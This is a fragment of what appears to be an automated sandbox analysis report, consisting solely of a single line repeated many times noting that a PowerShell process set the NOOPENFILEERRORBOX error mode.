                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
